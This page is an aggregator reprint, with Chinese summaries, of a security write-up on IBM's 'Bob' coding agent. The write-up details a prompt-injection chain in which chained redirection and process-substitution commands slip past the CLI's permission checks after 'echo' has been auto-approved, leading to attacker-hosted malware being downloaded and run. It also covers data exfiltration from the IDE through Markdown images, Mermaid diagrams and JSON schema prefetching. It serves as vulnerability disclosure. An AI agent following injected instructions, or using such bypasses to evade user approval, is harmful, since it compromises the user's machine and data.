``` IBM人工智能(“鲍勃”)下载并执行了恶意软件 ```
IBM AI ('Bob') Downloads and Executes Malware

原始链接: https://www.promptarmor.com/resources/ibm-ai-(-bob-)-downloads-and-executes-malware

## IBM Bob 编码代理漏洞摘要 IBM Bob,IBM 目前处于封闭测试阶段的 AI 编码代理,存在严重的安全漏洞。研究人员发现,Bob CLI 容易受到提示注入攻击,如果任何命令启用了“始终允许”功能(IBM 本身将其标记为“高风险”),则可能在未经用户同意的情况下执行恶意软件。 具体来说,攻击者可以通过使用重定向运算符 (>) 或进程替换 (>(command)) 串联命令来绕过安全检查,从而欺骗系统在预先批准良性命令后自动批准恶意载荷。这使得攻击者能够安装勒索软件、窃取凭据或完全控制用户的机器。 Bob IDE 也表现出 AI 应用程序常见的漏洞,包括通过渲染的 Markdown 图像和 Mermaid 图表进行数据泄露(将请求记录到攻击者控制的端点)以及从潜在恶意 URL 预取 JSON 模式。 这些发现凸显了 IBM Bob 公开发布前的重大风险,并强调需要强大的安全改进来保护用户。

## IBM 的“Bob”人工智能易受恶意软件下载攻击 Promptarmor 最近的一项测试表明,IBM 新的人工智能编码代理“Bob”(目前处于封闭测试阶段)可以通过提示注入被欺骗下载并执行恶意软件。这与之前在 Google 的 Antigravity 中发现的一个漏洞相似,后者已通过“安全模式”得到解决。 评论员指出,对于测试软件来说,这并不意外,并认为这些人工智能工具*可能*最终可以通过减少危险的代码复制粘贴来提高安全性。然而,人们仍然担心人工智能辅助编码的更广泛影响,包括扩展问题以及代码本身的固有责任。 讨论的重点是缺乏向 IBM 的漏洞披露时间表、难以防止非确定性 LLM 行为以及强大权限边界的重要性。许多人建议在未经审查的情况下防止代码执行,或利用隔离环境。一个突出的问题是未能正确解析命令,模糊了人工智能中数据和逻辑之间的界限。最终,共识倾向于谨慎实施,并随着人工智能编码工具的不断发展,需要更强的安全措施。
相关文章

原文

A vulnerability has been identified that allows malicious actors to exploit IBM Bob to download and execute malware without human approval if the user configures ‘always allow’ for any command.

IBM Bob is IBM’s new coding agent, currently in Closed Beta. IBM Bob is offered through the Bob CLI (a terminal-based coding agent like Claude Code or OpenAI Codex) and the Bob IDE (an AI-powered editor similar to Cursor).

In this article, we demonstrate that the Bob CLI is vulnerable to prompt injection attacks resulting in malware execution, and the Bob IDE is vulnerable to known AI-specific data exfiltration vectors. 

In the documentation, IBM warns that setting auto-approve for commands constitutes a 'high risk' that can 'potentially execute harmful operations' - with the recommendation that users leverage whitelists and avoid wildcards. We have opted to disclose this work publicly to ensure users are informed of the acute risks of using the system prior to its full release. We hope that further protections will be in place to remediate these risks for IBM Bob's General Access release.

  • The user wants to explore a new repository - they ask Bob for help.

  • Bob prompts the user several times with benign ‘echo’ commands; after the third time, the user selects ‘always allow’ for execution of ‘echo’.

  • Bob attempts to ‘test’ the user as part of the training by offering a dangerous command. However, the command has been specially crafted to bypass built-in defenses, so it executes immediately, installing and running a script retrieved from an attacker’s server.

  • When a multi-part command is requested (using operators like ‘;’), the user is shown a request that asks for permission to run each sub-command.

    Note, this modal says: ‘Allow execution of echo, cat’.

    This is bypassed because the defense system fails to identify separate sub-commands when they are chained using a redirect operator (>).

    Note, this modal only mentions: ‘Allow execution of echo’.

  • Bob prohibits the use of command substitution like $(command) as a security measure. 

    However, even though the security message says it's restricted, the underlying code fails to adequately restrict evaluation via process substitution: >(command).

    This allows for the output of the malicious sub-command that retrieves the malware to be used as the input for the sub-command to execute that malware. 

    One can examine where the defense should have been in the minified JS source code:

    function detectCommandSubstitution(cmd) {
          ...
          if (
            ...
              (ch === "$" && nxt === "(") ||      
              (ch === "<" && nxt === "(" ... && !inBacktick) || 
              (ch === "`" && !inBacktick)         
    	  
      	    ...
          ) {
            return true;
          }
        ...
        return false;
      }
  • By pre-fixing the malicious command with a benign ‘echo’, which the user has selected ‘always approve’ for, the user inadvertently auto-approves the entire malicious payload (since bypasses 1 and 2 prevent the payload from being recognized as separate commands). 

  • With the ability to deliver an arbitrary shell script payload to the victim, attackers can leverage known (or custom) malware variants to conduct cyber attacks such as:

  • Executing ransomware that encrypts or deletes files

  • Credential theft or spyware deployment

  • Device takeover (opening a reverse shell)

  • Forcing the victim into a cryptocurrency-mining botnet

  • Together, these outcomes demonstrate how a prompt injection can escalate into a full-scale compromise of a user’s machine through vulnerabilities in the IBM Bob CLI.

    Additional findings indicate that the Bob IDE is susceptible to several known zero-click data exfiltration vectors that affect many AI applications:

  • Markdown images are rendered in model outputs, with a Content Security Policy that allows requests to endpoints that can be logged by attackers (storage.googleapis.com).
    Here is an interesting spin on the typical Markdown image attack where, beyond just exfiltrating data from query parameters as the image is rendered, the image itself is hyperlinked and made to pose as a button - used for phishing.

  • Mermaid diagrams supporting external images are rendered in model outputs, with a Content Security Policy that allows requests to endpoints that can be logged by attackers (storage.googleapis.com).

  • JSON schemas are pre-fetched, which can yield data exfiltration if a dynamically generated attacker-controlled URL is provided in the field (this can happen before a file edit is accepted). 

  • 联系我们 contact @ memedata.com